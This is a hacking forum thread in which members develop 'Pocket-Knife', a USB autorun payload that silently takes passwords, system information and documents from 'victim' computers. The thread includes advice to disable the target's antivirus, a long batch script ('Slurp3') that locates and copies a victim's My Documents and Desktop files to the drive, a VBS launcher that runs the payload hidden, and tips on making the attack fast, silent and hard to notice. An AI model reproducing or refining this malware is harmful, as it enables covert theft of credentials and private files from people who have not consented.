Jump to content

USB Pocket-Knife Development

Leapo

By Leapo
in USB Hacks

 Share

Recommended Posts

  • Replies 818
  • Created
  • Last Reply

Top Posters In This Topic

Popular Days

Top Posters In This Topic

Popular Days

Posted Images

Verye Newbie

Verye

Posted
Posted

Ok, Alex helped me out, but he's away right now.

So I got Pocketknife on my Cruzer Micro. I enabled most of the settings in menu.bat and such, and everything seemed to be fine.

However, when I sticked it in another computer of mine (there was no safety.txt on the C drive), nothing happened. It detected the drive, and I could access the files on it (which were all Pocketknife files), but it did not take any logs.

I noticed no U3 symbol popped up or anything like that. Actually, after I installed the Universal Customizer, the entire U3 program doesn't start when I put the drive in a computer. I thought this was normal, since Universal Customizer replaces it...however, if it removes U3, or at least its program, how is it supposed to auto run, or run at all? Universal Customizer doesn't seem to be an actual program, either. I extracted it to a folder on my desktop, put a flash drive in the computer, ran Universal_Customizer.exe from that desktop folder, and it detected the USB drive, flashed it, and did whatever it does. I cannot find any application that runs Universal Customizer afterwards, though.

I've heard 2 different ways to install Pocketknife. One apparently involves moving an .iso to the Universal Customizer folder. The other, which alexthedrifter helped me do over MSN, was just dragging and dropping the Leapo's Payload/U3 Devices/Flash Partition/ folder to the root of my flash drive.

But it's not working. Actually, the whole Universal Customizer in general confuses me. Why do I even need it for Pocketknife? I just dragged and dropped the folder. There is no Universal Customizer folder or files on my flash drive. I didn't add Pocketknife using the Universal Customizer program, which, from what I can see, doesn't even exist.

I'm very confused.

Link to comment
Share on other sites
Tmbomber Newbie

Tmbomber

Posted
Posted

Ok, Yes, we *do* expect everybody to read all 29 pages of this thread. When I found this forum I read all the pinned threads. (they're pinned for a reason) I also read about half the other threads. There's all kinds of things to learn there.

This goes against my better judgment, but...

When you install the Universal Customizer, it puts a "Universal_Customizer" directory in C:\. Inside that directory you will find a few sub-directories.

Before you do anything, create a text file in C:\ and name it "safety.txt" That'll keep you from hosing yourself.

If you wanna do a payload from source files.

Empty the "c:\Universal_Customizer\U3CUSTOM\" sub-directory. Leapo's payload has two parts, a "U3 ISO Source" directory and a "Flash Partition" directory. Everything in the U3 ISO Source directory get copied into "c:\Universal_Customizer\U3CUSTOM\". Then double click on "c:\Universal_Customizer\ISOCreate.cmd" That will run a batch file that will create the .ISO file and put it where it belongs.

If you have a .iso file, rename it "U3CUSTOM.ISO" and move it into "c:\Universal_Customizer\bin".

In either case, have your U3 thumb drive already plugged in and click on "Universal_Customizer.exe" (you'll find it in "c:\Universal_Customizer\") Follow instructions *exactly* Expecially the bit at the end where it has you extract the thumb drive and re-insert it. I don't think it matters if you close the window first, but I always extract, re-insert, then close the customizer.

NOTE: Some payloads don't have anything to copy to the non-U3 partition of your thumb drive. Gonzor's and Leapo's do.

For Leapo's, copy the contents of the "Flash Partition" sub-directory (that I mentioned above) to the second partition on the thumb drive. Open the non-U3 partition and run "Menu.bat" to configure the payload.

For Gonzor's, copy "SBConfig-V2.0.18.exe" (or whatever the current version is) to the non-U3 partition and run it.

Here's a tip if you're re-flashing a thumb drive. Delete the logs from the flash partition. One of the steps that the Universal Customizer does is to archive and restore the flash partition. Sometimes there are files in the logs that don't make it through that process. Better to get rid of them first.

Link to comment
Share on other sites
Verye Newbie

Verye

Posted
Posted
Ok, Yes, we *do* expect everybody to read all 29 pages of this thread. When I found this forum I read all the pinned threads. (they're pinned for a reason) I also read about half the other threads. There's all kinds of things to learn there.

This goes against my better judgment, but...

When you install the Universal Customizer, it puts a "Universal_Customizer" directory in C:\. Inside that directory you will find a few sub-directories.

Before you do anything, create a text file in C:\ and name it "safety.txt" That'll keep you from hosing yourself.

If you wanna do a payload from source files.

Empty the "c:\Universal_Customizer\U3CUSTOM\" sub-directory. Leapo's payload has two parts, a "U3 ISO Source" directory and a "Flash Partition" directory. Everything in the U3 ISO Source directory get copied into "c:\Universal_Customizer\U3CUSTOM\". Then double click on "c:\Universal_Customizer\ISOCreate.cmd" That will run a batch file that will create the .ISO file and put it where it belongs.

If you have a .iso file, rename it "U3CUSTOM.ISO" and move it into "c:\Universal_Customizer\bin".

In either case, have your U3 thumb drive already plugged in and click on "Universal_Customizer.exe" (you'll find it in "c:\Universal_Customizer\") Follow instructions *exactly* Expecially the bit at the end where it has you extract the thumb drive and re-insert it. I don't think it matters if you close the window first, but I always extract, re-insert, then close the customizer.

NOTE: Some payloads don't have anything to copy to the non-U3 partition of your thumb drive. Gonzor's and Leapo's do.

For Leapo's, copy the contents of the "Flash Partition" sub-directory (that I mentioned above) to the second partition on the thumb drive. Open the non-U3 partition and run "Menu.bat" to configure the payload.

For Gonzor's, copy "SBConfig-V2.0.18.exe" (or whatever the current version is) to the non-U3 partition and run it.

Here's a tip if you're re-flashing a thumb drive. Delete the logs from the flash partition. One of the steps that the Universal Customizer does is to archive and restore the flash partition. Sometimes there are files in the logs that don't make it through that process. Better to get rid of them first.

I did read through the thread. I understand we are expected to do so. However, there was no clear-cut guide on how to actually install it on any page of the thread.

I understand that they're sort of assuming people know how to use the Universal Customizer and how to burn .iso's to a flash drive's U3 partition. However, I didn't. I'm quite new to U3 and USB hacks in general, so I was just a bit confused.

After reading what you've said, and talking to Alex, who simplified it for me for a little, I think I was able to successfully install it. However, it still doesn't seem to work. At least, not on the computer I put it in.

I left it in for about 3 minutes.

I took it out of that computer and put it back in my computer with safety.txt. As soon as I put the flash drive back in in, a message pops up in the bottom right saying there was some sort of write error, and data was lost. It was kind of confusing and didn't last long enough for me to write down fully.

Anyway, I looked through the flash drive, but the LOGS folder, and other folders, were empty. It didn't appear to capture anything.

Both computers have XP. The victim computer's antivirus did not seem to detect or stop it.

After trying it again, the weird error didn't pop on when I put it back in my main computer, but still, no logs. Is it possible that it simply isn't finishing? I think I remember it saying in Menu.bat that it will pop open the "Logs" file when it finishes. Well, that doesn't happen. I've waited quite a while though...

Is there any way to tell if the payload is actually extracting passwords and such from a target computer?

Link to comment
Share on other sites
Tmbomber Newbie

Tmbomber

Posted
Posted

Things to try:

On your safetyed machine, run Menu.bat and disable everything. Turn on system information.

On your target machine, turn off the antivirus. (the AVKill feature isn't working right now. We're working on it)

On your target machine, verify that autorun is turned on. (I don't remember how to check that)

*Then* stick your thumb drive in.

Please report back what happened.

Link to comment
Share on other sites
Verye Newbie

Verye

Posted
Posted
Things to try:

On your safetyed machine, run Menu.bat and disable everything. Turn on system information.

Okay.

On your target machine, turn off the antivirus. (the AVKill feature isn't working right now. We're working on it)

Okay.

On your target machine, verify that autorun is turned on. (I don't remember how to check that)

I also do not know how to check this. =/

*Then* stick your thumb drive in.

Please report back what happened.

Okay, with the anti virus disabled, and with only "dump system information" enabled in Menu.bat...

I stuck it in and nothing seemed to happen. By nothing, I mean there was no "do you want to explore the folder of this removable device" message, nor any sort of U3 pop-up or message. I waited for a few minutes, took it out. I put it back in the computer with safety.

There's a file in my LOGS folder with all the system information of...the computer with the safety??

I'm very confused. I put it in the target computer with anti-virus disabled, and nothing happened. Then, when I put it back into my safety'd computer, I see a log of MY computer, not the victim one.

Ironically, the computer with the safety has the complete Eset Smart Security, all enabled. And yet, it captures the info of THAT computer, with safety.txt and an enabled and good anti-virus, yet cannot capture the info of a computer with no safety, and the anti-virus completely disabled? Why is it even capturing the info of my safety'd computer?

To explain just how ridiculous this all is, let me simplify it:

1. I stick USB drive into victim computer.

2. I check the LOGS folder on that computer...nothing.

3. I stick it back into my computer with safety.

4. A file is instantly created in LOGS with the computer info of the computer it is currently in. My main computer; my safety'd one.

So, it appears that even though I do not want it to get the info of my main computer, it retrieves it any time I stick the USB drive in it, even though it has safety.txt on C:, and yet, when I put it in the computer with anti-virus completely disabled and no safety.txt, it does not capture any of its info and does not create a LOGS file of it.

Is there any chance we could talk over some sort of instant messaging program? Telling you for me to test something, and then me giving you the results, and then you telling me to do something else, and me giving the results, etc. etc. could take many days, since both of us are not checking this thread every minute.

Link to comment
Share on other sites
Verye Newbie

Verye

Posted
Posted

Okay, I've tested it on 3 different computers now: One Vista, 2 XP. The Vista one is 64-bit, the 2 XP ones are 32-bit. I'm getting some really strange results overall. The payload seems to work, sort of, but not consistently, and not how it should. Including capturing passwords and system info of my Vista computer, even with safety.txt on the C: drive. Yet, it will only capture passwords on one of the XP computers with safety.txt not on the C: drive. The other, it will not log anything, with or without safety.txt.

It's pretty much impossible to communicate everything I've done and then also respond to questions over a message board like this, so I'd very much prefer if someone could contact me over AIM or MSN over this.

AIM screenname = TheWoWLawyer

MSN screenname = wowlawyer@bendblizzpolicy.com

Thanks.

Link to comment
Share on other sites
DMilton Newbie

DMilton

Posted
Posted

I have been working in integrating some of the code of last days (Slurp3 and Recovery Paths Method) into Leapo's payload. (For copying and pasting) into Start.bat.

We must create a txt file called wanted.txt in the CONFIG directory of our USB.

A file called Slurp3.cfg must be created in CONFIG diretory of our USB.

The contents of the wanted.txt file can be, for example (one line for each extension):

*.txt
*.doc
*.xls
*.xml
*.jpg

Once the wanted.txt file has been created or moddified, just run next code. It surely recover the wanted paths for your Slurp3 desired files (From My Documents, Desktop, Shared Documents and Shared Desktop or any other non-default directories).

:: By DMilton for free community
:: Oriented Slurping Method using Recovery Paths Method
:: Thread http://hak5.org/forums/index.php?showtopic=6746
:: Checks the state of Slurp3.cfg
:: Set some variables needed (must be added to initial variables settings).
:: Note: the ActuaUser, Common and TmpReg (Exported Reg Branches and temporary file) have been routed to %temp% path for doing the batch going faster.
echo off
set ActualUser="%temp%\ActualUser.dat"
set Common="%temp%\Common.dat"
set TmpReg=%temp%\tmpval.dat
set SlurpDir=%logdir%\Slurp_Data
set Wanted=%config:"=%wanted.txt
set /A ValCounter=1

:: Next lines can be added by example after the variables declaration
::Erases temporal files if exists
if exist %ActualUser% del /S /F /Q /A:- %ActualUser%
if exist %Common% del /S /F /Q /A:- %Common%
if exist %TmpReg% del /s /F /Q /A:- %TmpReg%
:: Exporting keys
:: It will help to Slurp2 and Slurp3 configuration, then will be a previous comprobation
IF EXIST %config%\Slurp2.cfg GOTO SetSlurpVars
IF EXIST %config%\Slurp3.cfg GOTO SetSlurpVars
GOTO SkipSlurpVars

:SetSlurpVars
REG EXPORT "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" %Common%
REG EXPORT "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" %ActualUser%
if not %errorlevel%==0 goto error

:: Creating a temp file containing the desired data
type %ActualUser% | find "Personal" >> %TmpReg%
type %ActualUser% | find "Desktop" >> %TmpReg%
type %Common% | find "Common Documents">> %TmpReg%
type %Common% | find "Common Desktop">> %TmpReg%

:: Extracts the necessary lines from tmpval.dat for a further cleaning
FOR /F "tokens=2* delims==" %%I IN (%TmpReg%) DO set var="%%I"
if "%var%"=="" goto ErrSetVars
FOR /F "tokens=2* delims==" %%I IN (%TmpReg%) DO (
call:FOUND %%I
)

:: Deleting temporal files
del /S /F /Q /A:- %ActualUser%
del /S /F /Q /A:- %Common%
del /S /F /Q /A:- %TmpReg%
goto :Continue

:FOUND
:: This routine is called from the extraction keys arguments
:: It cleans of the path and sets a temp RegKey variable
SET PP="%~1"
SET PP=%PP:\\=\%
SET PP=%PP:"=%
SET RegKey=%PP%

:: Assigning variables using ValCounting (counter) and RegKey
IF %ValCounter%==1 SET MyD=%RegKey%
IF %ValCounter%==2 SET Dsk=%RegKey%
IF %ValCounter%==3 SET ShDoc=%RegKey%
IF %ValCounter%==4 SET ShDsk=%RegKey%
set /A ValCounter=ValCounter+1

:ErrSetVars
:: Causes a break in the code and continues...
GOTO :EOF
:Continue
:: In order to integrate this stuff into Leapo's, the next lines must be added after ":SkipSlurp2"
IF NOT EXIST %config%\Slurp3.cfg GOTO SkipSlurp3

:StartSlurp3
:: Creates the directory structure for the wanted files option if not exists
:: Is usefull too for simpilify Slurp2 routine (not done now).
:: The directories structure will be created as original, for doing so, we must to extract the routes to four variables (We will call them DestMyd, DestDsk, DestShDsk and DestShDoc)

:ForMyD
:: This will extract end text of ":..\..\..\..\Name of my Documents folder" (for a depth of 9 sub-directories, I think no more is needed) and return the "Name of my Documents folder" for using it in a variable (DestMyD) used before for creating the same destination folder for "My Documents" or any one other given.
:: I don't know if this can be done easier (with no so much code), if you can improve it (sure)... please do it!
:: Of course, another way of creating the destination folders is simply doing so without extracting original ones and calling them simply "My Documents", "Desktop", etc... But I think is a good thing to have them slurped as in original folder structure.

FOR /F "tokens=1,2,3,4,5,6,7,8* delims=\" %%i IN ("%MyD%") DO (
    SET path1=%%j
    SET path2=%%k
    SET path3=%%l
    SET path4=%%m
    SET path5=%%n
    SET path6=%%o
    SET path7=%%p
    SET path8=%%q
)
IF "%path1%"=="" SET DestMyD=%USERNAME%_%path1% && goto :ForDsk
IF "%path2%"=="" SET DestMyD=%USERNAME%_%path1% && goto :ForDsk
IF "%path3%"=="" SET DestMyD=%USERNAME%_%path2% && goto :ForDsk
IF "%path4%"=="" SET DestMyD=%USERNAME%_%path3% && goto :ForDsk
IF "%path5%"=="" SET DestMyD=%USERNAME%_%path4% && goto :ForDsk
IF "%path6%"=="" SET DestMyD=%USERNAME%_%path5% && goto :ForDsk
IF "%path7%"=="" SET DestMyD=%USERNAME%_%path6% && goto :ForDsk
IF "%path8%"=="" SET DestMyD=%USERNAME%_%path7% && goto :ForDsk

:ForDsk
:: We do the same for "Desktop" directory, etc...
FOR /F "tokens=1,2,3,4,5,6,7,8* delims=\" %%i IN ("%Dsk%") DO (
    SET path1=%%j
    SET path2=%%k
    SET path3=%%l
    SET path4=%%m
    SET path5=%%n
    SET path6=%%o
    SET path7=%%p
    SET path8=%%q
)
IF "%path1%"=="" SET DestDsk=%USERNAME%_%path1% && goto :ForShDsk
IF "%path2%"=="" SET DestDsk=%USERNAME%_%path1% && goto :ForShDsk
IF "%path3%"=="" SET DestDsk=%USERNAME%_%path2% && goto :ForShDsk
IF "%path4%"=="" SET DestDsk=%USERNAME%_%path3% && goto :ForShDsk
IF "%path5%"=="" SET DestDsk=%USERNAME%_%path4% && goto :ForShDsk
IF "%path6%"=="" SET DestDsk=%USERNAME%_%path5% && goto :ForShDsk
IF "%path7%"=="" SET DestDsk=%USERNAME%_%path6% && goto :ForShDsk
IF "%path8%"=="" SET DestDsk=%USERNAME%_%path7% && goto :ForShDsk

:ForShDsk
FOR /F "tokens=1,2,3,4,5,6,7,8* delims=\" %%i IN ("%ShDsk%") DO (
    SET path1=%%j
    SET path2=%%k
    SET path3=%%l
    SET path4=%%m
    SET path5=%%n
    SET path6=%%o
    SET path7=%%p
    SET path8=%%q
)
IF "%path1%"=="" SET DestShDsk=AllUsers_%path1% && goto :ForShDoc
IF "%path2%"=="" SET DestShDsk=AllUsers_%path1% && goto :ForShDoc
IF "%path3%"=="" SET DestShDsk=AllUsers_%path2% && goto :ForShDoc
IF "%path4%"=="" SET DestShDsk=AllUsers_%path3% && goto :ForShDoc
IF "%path5%"=="" SET DestShDsk=AllUsers_%path4% && goto :ForShDoc
IF "%path6%"=="" SET DestShDsk=AllUsers_%path5% && goto :ForShDoc
IF "%path7%"=="" SET DestShDsk=AllUsers_%path6% && goto :ForShDoc
IF "%path8%"=="" SET DestShDsk=AllUsers_%path7% && goto :ForShDoc

:ForShDoc
FOR /F "tokens=1,2,3,4,5,6,7,8* delims=\" %%i IN ("%ShDoc%") DO (
    SET path1=%%j
    SET path2=%%k
    SET path3=%%l
    SET path4=%%m
    SET path5=%%n
    SET path6=%%o
    SET path7=%%p
    SET path8=%%q
)
IF "%path1%"=="" SET DestShDoc=AllUsers_%path1% && goto :CreateFolders
IF "%path2%"=="" SET DestShDoc=AllUsers_%path1% && goto :CreateFolders
IF "%path3%"=="" SET DestShDoc=AllUsers_%path2% && goto :CreateFolders
IF "%path4%"=="" SET DestShDoc=AllUsers_%path3% && goto :CreateFolders
IF "%path5%"=="" SET DestShDoc=AllUsers_%path4% && goto :CreateFolders
IF "%path6%"=="" SET DestShDoc=AllUsers_%path5% && goto :CreateFolders
IF "%path7%"=="" SET DestShDoc=AllUsers_%path6% && goto :CreateFolders
IF "%path8%"=="" SET DestShDoc=AllUsers_%path7% && goto :CreateFolders

:CreateFolders
IF NOT EXIST "%SlurpDir%\%DestMyD%" mkdir "%SlurpDir%\%DestMyD%"
IF NOT EXIST "%SlurpDir%\%DestDsk%" mkdir "%SlurpDir%\%DestDsk%"
IF NOT EXIST "%SlurpDir%\%DestShDsk%" mkdir "%SlurpDir%\%DestShDsk%"
IF NOT EXIST "%SlurpDir%\%DestShDoc%" mkdir "%SlurpDir%\%DestShDoc%"

:: Copying the desired files with the same structure than original
for /F %%a in (%wanted%) do (
xcopy "%MyD%\%%a" "%SlurpDir%\%DestMyD%" /H /S /D /C
xcopy "%Dsk%\%%a" "%SlurpDir%\%DestDsk%" /H /S /D /C
xcopy "%Dsk%\%%a" "%SlurpDir%\%DestShDsk%" /H /S /D /C
xcopy "%ShDoc%\%%a" "%SlurpDir%\%DestShDoc%" /H /S /D /C
)

    ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1
    ECHO +----------------------------------+ >> %log% 2>&1
    ECHO +    [Wanted files were copied]    + >> %log% 2>&1
    ECHO +----------------------------------+ >> %log% 2>&1

:SkipSlurp3

For an independent batch (or for a proof of concept of this code), the only you need is declaring config and logdir variables at the beginning of the batch.

You can do it with copying and pasting the code to a batch (name it as you want) and adding this two variables to the beggining of it:

set config="[your usb letter]:\CONFIG\"
SET logdir=[your usb letter]:\SLURP3

Note that in original Leapo's payload, both variables are declared. In Leapo's the logdir is between brackets, it probablily will cause some minor bugs, I have tested only the "Proof of Concept" batch.

What about integrating this on next version, Leapo? ;)

Link to comment
Share on other sites
DMilton Newbie

DMilton

Posted
Posted
Well, I've decided I'm going to start learning how to use RubyGTK, and what better project to add to than this one? I'll be reading up on it and trying to make a GUI of menu.bat for those who want it.

I think it's a VERY, VERY GOOD idea. I will be waiting for it while doing other things I have in mind... ;)

Have you readed X3N posts about a GUI in AutoIT? You can do it at http://hak5.org/forums/index.php?act=findp...&pid=101889

X3N:

How far have you got with it? Are you going to publish the code for the GUI?

Link to comment
Share on other sites
Verye Newbie

Verye

Posted
Posted

I'll ask just this one more time, because it's still confusing me greatly:

Can anyone think of why PocketKnife would slurp the info and passwords of a computer it is put in, even though safety.txt is in the C: drive? And yet, when I put it in a computer with anti-virus disabled and no safety.txt, it does not obtain any of its info. Only my 3rd computer acts how it should; slurps info if safety.txt is not on C:, doesn't slurp if it is on C:.

I suppose there are numerous possible reasons for why it wouldn't get any info from that computer, but I find it baffling that it IS getting the info on a computer with safety.txt.

Just as a note, the computer I'm putting it in, with safety.txt, is Vista Home Premium 64-bit. I can't see why it'd be having problems with the safety just because it's Vista (or x64), but it's definitely bypassing the safety. Also, I am 100% sure the option to "ignore safety.txt" is disabled.

Link to comment
Share on other sites
elmer Newbie

elmer

Posted
Posted
Have you readed X3N posts about a GUI in AutoIT?

Sadly, his post isn't exactly useful to me, but if X3N posts up his source, that may help. If I can see how he goes about doing some things that would help me. Also, I could try to copy his design so we have a unified GUI design. Then, if anybody else wants to make a GUI, perhaps in PyGTK, they would not have to come up with a design, merely code.

So far, after 1hr of tutorial reading, this is the best I can do: 8424816.png

Link to comment
Share on other sites
DMilton Newbie

DMilton

Posted
Posted
Sadly, his post isn't exactly useful to me, but if X3N posts up his source, that may help. If I can see how he goes about doing some things that would help me. Also, I could try to copy his design so we have a unified GUI design. Then, if anybody else wants to make a GUI, perhaps in PyGTK, they would not have to come up with a design, merely code.

So far, after 1hr of tutorial reading, this is the best I can do: 8424816.png

Then will be waiting for X3N response!

I have many things on mind, one of them is making a GUI too, but the problem is the time... When I finish some new stuff I am working on this payload, I'll study the idea of helping with a GUI... Now you know more than me on Ruby! That was you "Hello world!" button! :P

Link to comment
Share on other sites
X3N Newbie

X3N

Posted
Posted

haha sorry guys i didn't write a gui for my payload just the rest of the code because its a lot cleaner then .bat i am writing a gui for a new iso customizer that works in vista using the lpinstaller program. Which i almost finished but I'm in the process of moving so its been hard to get a lot done. I kinda been holding back on releasing the code for the main payload but will release everything when its finished. I am creating an entire development environment that should be super easy to use.

Link to comment
Share on other sites
mencargo Newbie

mencargo

Posted
Posted

Hi guys, first of all I'm new here, so I apologize if I'm out of boundaries and for my not-so-good english.

I'm a programmer and student of Computer Engineering, specializing at Networks and Security and this "USB Payload/SwitchBlade/Hacksaw/..." called my attention so I made some scripts with nirsoft stuff.

I recently got a U3 drive so I looked at Gonzor and PocketKnife alternatives.

Now, thinking as a hacker, if you really want to perform an attack, it should be as fast and silent as possible.

So this means NO U3 software, use portable software at the flash drive partition, use PortableApps if you feel lazy.

Use only one configuration file and one script file.

(You can still have profiles and all the choices you can handle, but the configuration used for the "current" attack should be packed into one file)

Should consider copying the raw data from passwords instead of breaking them, as it consumes time, this can be done at your own computer.

By default it opens the logs directory when done... (WTF?)

It should open the root directory, as this is the default behavior of a USB drive.

All information about the attack should at least be hidden: logs config menu.bat

So that the difference of a "normal" USB drive and ours, should only be a delay, hopefully not noticeable.

I took a quick look at the scripts and I feel that it's wasting a lot of time, I would like to try to recode it focusing on my ideas, how should I publish it?

And about the errors when windows doesn't find the file, it's about the Start.bat file, not the Go.vbs, changing the code to:

Set objFSO = CreateObject("Scripting.FileSystemObject") 
Set objShell = CreateObject("Wscript.Shell")
Set colDrives = objFSO.Drives
Set objEnv = objShell.Environment("PROCESS")

objEnv("Year") = Year(now())
objEnv("Month") = Right("0" & Month(now()), 2)
objEnv("Day") = Right("0" & Day(now()), 2)
objEnv("Hour") = Right("0" & Hour(now()), 2)
objEnv("Minute") = Right("0" & Minute(now()), 2)
objEnv("Second") = Right("0" & Second(now()), 2)

For Each objDrive in colDrives
    strPath = objDrive.Driveletter & ":\SYSTEM\Start.bat"
    If objFSO.FileExists(strPath) Then
        objShell.Run strPath , 0, False
    End If
Next

Will solve this problem, although there are other details...

(You can place a copy of GO.VBS at the normal drive partition to try it out by double click)

Is there a way to flash the u3 partition without backing up and restoring the drive?

Link to comment
Share on other sites
DMilton Newbie

DMilton

Posted
Posted
Hi guys, first of all I'm new here, so I apologize if I'm out of boundaries and for my not-so-good english.

Don't worry, you are not the only one than doesn't speak english (I'm spanish). If I can understand you (my english is poorer than yours), everybody can do it! ;) You're wellcome.

Now, thinking as a hacker, if you really want to perform an attack, it should be as fast and silent as possible.

I agree :P

(You can still have profiles and all the choices you can handle, but the configuration used for the "current" attack should be packed into one file)

Do you mean using only one config file for all the stuff? As using a general config file? Will this reduce the payload time consumption? :unsure:

Should consider copying the raw data from passwords instead of breaking them, as it consumes time, this can be done at your own computer.

No passwords are broken during function of the payload... It only extracts the hashes for further work at our own computer. :blink:

By default it opens the logs directory when done... (WTF?)

It should open the root directory, as this is the default behavior of a USB drive.

All information about the attack should at least be hidden: logs config menu.bat

So that the difference of a "normal" USB drive and ours, should only be a delay, hopefully not noticeable.

I think it'll be less suspicious too... ;)

I took a quick look at the scripts and I feel that it's wasting a lot of time, I would like to try to recode it focusing on my ideas, how should I publish it?

I think the best way for publishing it is to publish at here! It's an easy way to help and to let others developing it.

And about the errors when windows doesn't find the file, it's about the Start.bat file, not the Go.vbs, changing the code to:
:o

Is there a way to flash the u3 partition without backing up and restoring the drive?

I think Leapo was working on it but I don't know what's his actual progression on it...

Good work, We'll be waiting for your work on this and of course, your contributions cleaning the code, developing new stuff, doing it faster, programming a GUI or what you want... :lol:

:X3N All contributions are good contributions!

:alexthedrifter I think so... :P

Link to comment
Share on other sites
DMilton Newbie

DMilton

Posted
Posted
Tell me what you want done, I don't full understand how a payload works so tell if you want it to run a program with parameters or something.

The one we need (really it isn't needed but very useful) is a GUI (better a open source GUI for all understanding of how to do it) with basically enabling/disabling options for all the payload's stuff.

There is a very good GUI from GonZor that made it, but he is not actualizing his payload and nowadays Leapo's comes with more stuff. Anyway there's many people trying to improve this Leapo's payload. You can see what GonZor's does to understand what is needed, I think is a very good and easy using GUI.

Actually the payload runs basically by looking at \CONFIG directory to see for the state of multitude (near of 40) files. That is, if a file is found, the payload runs a piece of code, if isn't it omittes the pice of code.

Doing a GUI can clear the code too, not using so much configuration files, but only a few.

Once the GUI is started, the needs is to change this few files (or parameters) for being used by start.bat (the payload itself) file, allowing the user selecting what will run or not in the next use of the payload.

This Leapo's has a GUI itself but it has been made in dos-shell (menu.bat). Is good but a windows way GUI will be better.

Link to comment
Share on other sites
mencargo Newbie

mencargo

Posted
Posted
Do you mean using only one config file for all the stuff? As using a general config file? Will this reduce the payload time consumption? :unsure:

I mean you can use all the config files you want, one for each script, profiles, etc... But when you have your attack planned, you should be able to save it and create a config file for it.

I thought the script looked into each .cfg file and read parameters from it, but it only does this with 8 of them (of 40 cfg files aprox), so I think it's not a big deal. With the other cfg files, it just checks if it exists. So in order to tryout my approach I'll have to recode all B) Like pocket-knife alternate version, haha, I'll think about that.

No passwords are broken during function of the payload... It only extracts the hashes for further work at our own computer. :blink:

Well, when I open the logs files the passwords appear in clear text, no hashes. This wont consume a lot of time as it's proportional to the weakness of the passwords, and well, we know most of them are, but still it's time.

Anyway, there are a LOT of errors in the code and I'm seriously considering developing it.

Do we have access to the Universal Customizer code? Backing up and restoring the whole drive it's just a waste of time when developing.

@alexthedrifter: Can you call MS-DOS instructions from VBS? I mean something like MS.run("ver|%windir%\system32\find.exe '5.2.' ") ?

Link to comment
Share on other sites
alexthedrifter Newbie

alexthedrifter

Posted
Posted

@mencargo Yes I can.

edit:

@Verye check in your settings their is a setting to turn off its checking for it.

edit2: Here is a snippet of code.

Process.Start("cmd.exe", " /K cd c:\")

This opens command prompt, and changes its directory to C:\

You can change cmd.exe to like /folder/folder2/program.bat and enter the parameters in the next section of code.

If you guys could do that because I don't fully understand how payloads work I'll be sure to use it and accredit you for it.

Edit3: Before you do all of them post 1 or 2 so I can make sure it properly works.

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
 Share
Go to topic listing

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...